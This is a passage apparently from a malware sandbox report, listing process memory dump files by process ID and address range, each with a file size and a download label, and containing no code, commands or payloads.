        • memory/1776-47-0x0000000002160000-0x0000000005BAE000-memory.dmp

          Filesize

          58.3MB

          Download

        • memory/1920-55-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/1920-61-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/1920-58-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

          Download

        • memory/2448-56-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/2448-66-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/2448-57-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

          Download

        • memory/2976-62-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/2976-60-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/2976-59-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/4800-50-0x00007FFD7CE10000-0x00007FFD7D8D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4800-46-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4800-44-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4800-42-0x00007FFD7CE10000-0x00007FFD7D8D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4800-12-0x00007FFD7CE10000-0x00007FFD7D8D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4800-14-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4800-8-0x000001187D1E0000-0x000001187D202000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4800-13-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4800-43-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4800-15-0x000001187AF30000-0x000001187AF40000-memory.dmp

          Filesize

          64KB

          Download